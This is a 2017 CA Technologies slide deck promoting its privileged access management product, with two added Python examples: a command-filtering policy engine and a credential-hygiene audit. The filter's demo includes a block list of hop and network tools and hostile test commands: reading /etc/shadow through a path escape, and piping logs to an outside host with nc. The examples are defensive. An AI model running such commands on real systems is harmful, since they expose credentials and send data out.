Managing Your Privileged Identities: The Choke Point of Advanced Attacks
Shirief Nosseir, EMEA Alliances Director, Identity & API Management
Tuesday, 16 May 2017
Agenda
- Why Privileged Access Management
- Why CA Technologies
2017 CA. ALL RIGHTS RESERVED. NO UNAUTHORIZED USE, COPYING OR DISTRIBUTION.
The Common Thread? Privileged Accounts
Privileged Access Management Trends
Drivers: Risk, Compliance, Technology Refresh, Emerging Enterprises
- Forrester estimates that 70% to 80% of data breaches involve the use of privileged and administrative passwords and credentials (Quick Take: 12 Lessons for Security & Risk Pros from the US OPM Breach, Forrester, 8 June 2015)
- The Privileged Access Management market grew by 33% to reach $690 Million in 2015 (Market Guide for Privileged Access Management, Gartner, 2 Aug 2016, ID: G00279025)
- CA Privileged Access Manager product licenses grew by 113% last year
Privileged Accounts: The Emerging Front Line
Organizations typically have 3-4x more privileged accounts than employees!
[Diagram of where privileged accounts live]
- Endpoints: Workstation, Mobile, Industrial Control Systems, Internet of Things
- On Premise: Employees/Partners; System Accounts, Network Accounts, DB Accounts, Application Accounts, Service Accounts, Business Accounts, Developer Accounts
- Internet/Cloud: Remote Privileged Users (Partners/Contractors/Employees), Apps
Privilege: Core of the Breach Kill Chain
[Kill chain diagram] External threats: Threat Actor crosses the Network Perimeter, then Gain/Expand Access, Elevate Privilege, Wreak Havoc, and C&C / Data/IP Exfiltration. Internal threats: Trusted Insider, Lateral Movement, Reconnaissance. Privilege elevation sits at the centre of both paths.
Risk & burden of privileged accounts
[Diagram] Hybrid cloud environment: Traditional Data Center, Software Defined Data Centre, Public & Private Cloud; actors: Individual Privileged Users, Privileged Personal Domain Accounts, Privileged Account; concerns: Security, Compliance, Efficiency.
Risks called out:
- Same password for local admin accounts
- Non-rotating passwords
- Hard-coded credentials
- Standing access
CA Privileged Access Manager (CA PAM)
[Diagram] Integrated Controls and Unified Policy Management for the Privileged User across the hybrid cloud environment (Traditional Data Center, Software Defined Data Centre, Public & Private Cloud).
Controls: Credential Vault, Authentication, Control Access, Auto-Login (SSO), Record Sessions, Enforce Policy, Threat Analytics, Log Everything
Key CA PAM Differentiators
- Scalability
- Quick Time-to-Value
- Defense-in-Depth
- Lower TCO
- Most Highly Certified Platform
- Hybrid Enterprise
CA Privileged Access Manager (CA PAM): Privileged Account Management for the Hybrid Enterprise
[Architecture diagram] Managed estate: Traditional Data Center (Mainframe, Windows, Linux, Unix, Networking; Enterprise Admin Tools), Software Defined Data Center (SDDC Console and APIs), Public Cloud - IaaS (Cloud Console and APIs), SaaS Applications (SaaS Consoles and APIs). CA Privileged Access Manager sits in front of all of these as a new security layer that controls and audits all privileged access, with Unified Policy Management and Identity Integration on an Enterprise-Class Core. Form factors: Hardware Appliance, OVF Virtual Appliance, AWS AMI.
Thank You
CA PAM: Application-to-Application Support
[Diagram] Applications fetch credentials from the Credential Vault instead of storing them, then use those credentials to reach other Applications and Data.
Scalability
Make sure to grow your capacity at a better & more predictable value.
CA PAM requires only a single appliance to protect thousands of resources, supporting a large number of concurrent sessions.
[Image: Danny MacAskill's Imaginate]
Quick Time-To-Value
Realize immediate and long-term benefits with an appliance form factor.
- Comprehensive solution based on a single appliance
- Deploys in as little as a few hours for smaller environments
- Intuitive and cost-effective to operate & maintain
- Rapid time-to-value, without the unexpected resource requirements that come with a software-only solution requiring its own infrastructure
Lower TCO
Don't get caught with HIGH COST of OWNERSHIP.
- CA provides an all-inclusive pricing model based on an appliance form factor
- CA pricing is easy to understand, without unexpected costs for multiple hardware/virtual instances, disaster recovery or high availability
- No incremental costs such as additional OS, DB and remote desktop licensing
- No huge cost of deployment, administration & maintenance
CA PAM for Hybrid Enterprise
Unified Control for Administrative consoles and Guest Systems & Applications
[Diagram] Cloud Admin and Guest system & Application Admin access is brokered to: AWS Public Cloud (All AWS Regions, VPC, GovCloud) via AWS Management Console & APIs and AWS Management APIs/SDK; vSphere, vCenter, vShield, vCloud and NSX Manager via Cloud Operations Automation; Microsoft Online Services via the Office 365 Console (CA Privileged Access Manager for Microsoft Online Services).
Most Highly Certified Platform
Make sure the solution is enterprise and government ready.
CA Privileged Access Manager is the first & currently only PAM product certified for Common Criteria using the NIAP*-Preferred Protection Profile.
What does this mean? CA PAM has met the Protection Profile evaluation required by NIAP before a commercial off-the-shelf product can be considered for procurement by the governments of 27 countries. A proof to the private sector that CA PAM meets the federal government's demands.
*National Information Assurance Partnership
Defense-In-Depth
Avoid being the next victim.
Only CA can offer a comprehensive solution for privileged access management, delivering both the broad protection and simplified deployment of a network-based solution, and the fine-grained protections enabled by a host-based product. Unlike other vendors, CA offers a more future-proof solution and allows you to better focus your investments using a risk-appropriate approach.
Comprehensive Privileged Access Lifecycle Management
[Diagram of the product stack, from identity to host]
- Identity-based security: Advanced Authentication, CA Identity Suite
- Privileged-access security: CA Privileged Access Manager (CA PAM)
- Host-based security (defense in depth): CA PAM Server Control
CA PAM Key Capabilities
Credential Safe
- Privileged credentials
- SSH session keys
- FIPS 140-2 Level 1 & 2 compliant encryption
- Optional HSM for FIPS 140-2 Level 3 support
- Application-to-Application support
- Industry's broadest platform support
Authentication
- Active Directory & LDAP
- RADIUS integration
- PKI/X.509 & Smartcard (PIV/CAC) support
- Multi-factor authentication (CA Technologies, RSA, VASCO, SafeNet, Entrust, etc.)
- Privileged user SSO
- Federated identity & attribution
Access Control
- Role-based privileged user access limits
- Zero Trust "deny all, permit by exception" policy engine
Monitoring, Alerting & Intervention
- Continuous monitoring & logging
- DVR-like session recording
- Command filtering
- Leapfrog prevention
- Proactive policy violation prevention
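To make the Access Control and Monitoring capabilities above concrete, here is an added example (not CA's code, and not how CA PAM is implemented) of a minimal "deny all, permit by exception" policy engine with role-based target limits, command filtering, leapfrog prevention and an audit trail of every decision. The roles, hostnames, rules and command lines are all constructed for the illustration; the treatment of hop commands and shell metacharacters is a deliberately simple stand-in for what a real command filter does.

```python
"""Added example, not CA's code: a minimal deny-by-default policy engine with
role-based target limits, command filtering, leapfrog prevention and an audit
log. Roles, hosts, rules and commands below are constructed for illustration."""
import fnmatch
import re
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Rule:
    role: str
    target: str            # glob of hosts this role may reach
    commands: tuple = ()   # globs of command lines permitted on those hosts


@dataclass
class Session:
    user: str
    role: str
    target: str
    audit: list = field(default_factory=list)   # one record per decision


# Constructed policy: nothing is reachable unless a rule says so.
POLICY = (
    Rule("dba", "db-*.corp.example", ("psql *", "pg_dump *")),
    Rule("web-ops", "web-*.corp.example",
         ("systemctl status *", "journalctl *", "cat /var/log/*")),
)

# Commands that would open a further hop from the target (leapfrogging).
HOP_COMMANDS = {"ssh", "telnet", "rdesktop", "xfreerdp", "nc", "scp", "sftp"}
# Chaining, redirection, expansion or path escapes: an allowed prefix must not
# smuggle a second command or a file outside the permitted tree.
UNSAFE = re.compile(r"[;&|`$<>]|\.\./")


def _matching_rule(sess):
    for rule in POLICY:
        if rule.role == sess.role and fnmatch.fnmatchcase(sess.target, rule.target):
            return rule
    return None


def authorize_session(sess):
    """Deny by default; permit only when a rule for the role covers the target."""
    rule = _matching_rule(sess)
    verdict = "allow" if rule else "deny"
    sess.audit.append({"event": "session", "user": sess.user,
                       "target": sess.target, "verdict": verdict})
    return rule is not None


def authorize_command(sess, cmdline):
    """Command filtering on an established session; every line is recorded."""
    rule = _matching_rule(sess)
    verdict, reason = "deny", "no rule"
    words = cmdline.split()
    if rule is None or not words:
        pass
    elif words[0] in HOP_COMMANDS:
        reason = "leapfrog"
    elif UNSAFE.search(cmdline):
        reason = "unsafe characters"
    elif any(fnmatch.fnmatchcase(cmdline, pat) for pat in rule.commands):
        verdict, reason = "allow", "matched"
    else:
        reason = "not permitted"
    sess.audit.append({"event": "command", "user": sess.user, "target": sess.target,
                       "cmd": cmdline, "verdict": verdict, "reason": reason})
    return verdict == "allow"


def run_demo():
    """Constructed session: returns the list of verdicts and the combined audit log."""
    s = Session("alice", "web-ops", "web-01.corp.example")
    results = [authorize_session(s)]
    for cmd in ("systemctl status nginx",
                "cat /var/log/nginx/access.log",
                "cat /var/log/../../etc/shadow",        # path escape inside an allowed prefix
                "journalctl -u nginx | nc 10.0.0.5 9",  # second command chained onto an allowed one
                "ssh db-01.corp.example",               # hop to a host this role may not reach
                "pg_dump prod"):                        # not in this role's command list
        results.append(authorize_command(s, cmd))
    other = Session("alice", "web-ops", "db-01.corp.example")
    results.append(authorize_session(other))
    return results, s.audit + other.audit


if __name__ == "__main__":
    for record in run_demo()[1]:
        print(record)
```

The point of the demo is the edge cases: a prefix match alone would have let `cat /var/log/../../etc/shadow` and the piped `nc` through, which is why the filter rejects chaining and path-escape characters before it ever consults the allow list, and why a hop command is refused regardless of the allow list.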
Risk & burden of privileged accounts
[Diagram] Hybrid cloud environment: Traditional Data Center, Software Defined Data Centre, Public & Private Cloud; actors: Individual Privileged Users, Privileged Personal Domain Accounts, Privileged Account; concerns: Security, Compliance, Efficiency.
Risks called out:
- Same password for local admin accounts
- Excessive permissions
- Local admin privileges for workstation users
- Non-rotating passwords
- Standing access
- Lack of accountability & visibility
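The risks on this slide and on the earlier "Risk & burden" slide (shared local-admin passwords, non-rotating passwords, hard-coded credentials, standing access) are all things an inventory check can surface before a vault is rolled out. The following is an added example, not CA's code and not a CA PAM feature, that runs such checks over a constructed account inventory and a constructed application config. The secret "fingerprint" (a truncated SHA-256 of the constructed secret) is an assumption standing in for whatever a vault would use to compare secrets; the 90-day rotation limit and the pinned date are likewise assumed.

```python
"""Added example, not CA's code: audit a constructed privileged-account inventory
for shared secrets, stale secrets, hard-coded credentials and standing access."""
import hashlib
import re
from datetime import date

MAX_AGE_DAYS = 90            # assumed rotation policy
TODAY = date(2017, 5, 16)    # pinned so the example is deterministic


def fp(secret):
    """Assumed stand-in for a vault's comparable secret identifier (constructed)."""
    return hashlib.sha256(secret.encode()).hexdigest()[:12]


# Constructed inventory: two workstations sharing one local-admin password,
# a service account, and a deploy account that is checked out per task.
ACCOUNTS = [
    {"host": "ws-101", "account": "Administrator", "kind": "local-admin",
     "secret_fp": fp("Winter2016!"), "last_rotated": date(2016, 1, 10), "standing": True},
    {"host": "ws-102", "account": "Administrator", "kind": "local-admin",
     "secret_fp": fp("Winter2016!"), "last_rotated": date(2016, 1, 10), "standing": True},
    {"host": "db-01", "account": "postgres", "kind": "service",
     "secret_fp": fp("s3rv1ce"), "last_rotated": date(2017, 4, 30), "standing": True},
    {"host": "web-01", "account": "deploy", "kind": "service",
     "secret_fp": fp("d3pl0y"), "last_rotated": date(2017, 5, 1), "standing": False},
]

# Constructed application config: one literal credential, one vault reference.
APP_CONFIG = """
db.host=db-01
db.user=postgres
db.password=s3rv1ce
api.token=${VAULT:api-token}
"""

# A secret-looking key with a literal value; a ${...} reference is not flagged.
HARDCODED = re.compile(
    r"^\s*([\w.]*(?:password|passwd|secret|token))\s*=\s*(?!\$\{)(\S+)", re.I | re.M)


def _name(a):
    return f'{a["account"]}@{a["host"]}'


def shared_secrets(accounts):
    """Same secret on more than one host: one compromise unlocks all of them."""
    by_fp = {}
    for a in accounts:
        by_fp.setdefault(a["secret_fp"], []).append(_name(a))
    return {k: v for k, v in by_fp.items() if len(v) > 1}


def stale_secrets(accounts, today=TODAY, max_age=MAX_AGE_DAYS):
    """Secrets older than the rotation policy allows."""
    return [_name(a) for a in accounts if (today - a["last_rotated"]).days > max_age]


def hardcoded_credentials(text, accounts):
    """Literal secrets in config, joined back to the vaulted account they expose."""
    found = []
    for m in HARDCODED.finditer(text):
        key, value = m.group(1), m.group(2)
        exposed = [_name(a) for a in accounts if a["secret_fp"] == fp(value)]
        found.append((key, exposed))
    return found


def standing_access(accounts):
    """Privileged accounts that are always live instead of granted per task."""
    return [_name(a) for a in accounts if a["standing"]]


def audit(accounts=ACCOUNTS, config=APP_CONFIG):
    return {
        "shared": shared_secrets(accounts),
        "stale": stale_secrets(accounts),
        "hardcoded": hardcoded_credentials(config, accounts),
        "standing": standing_access(accounts),
    }


if __name__ == "__main__":
    for finding, detail in audit().items():
        print(f"{finding}: {detail}")
```

Joining the hard-coded value back to the inventory is the useful step: it turns "a password sits in a config file" into "the postgres account on db-01 is exposed and must be rotated", which is the kind of prioritisation the slide's accountability and visibility concern is about.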
Recognitions
- Overall Rating: Ovum Decision Matrix: Selecting a Privileged Identity Management Solution, November 2015
- 2016 Gold: Innovations in Cloud Security
- 2016 Silver: Innovations in Privileged Identity Management
- Best Privileged Access Management Solution (two awards)
- Best Overall IT Company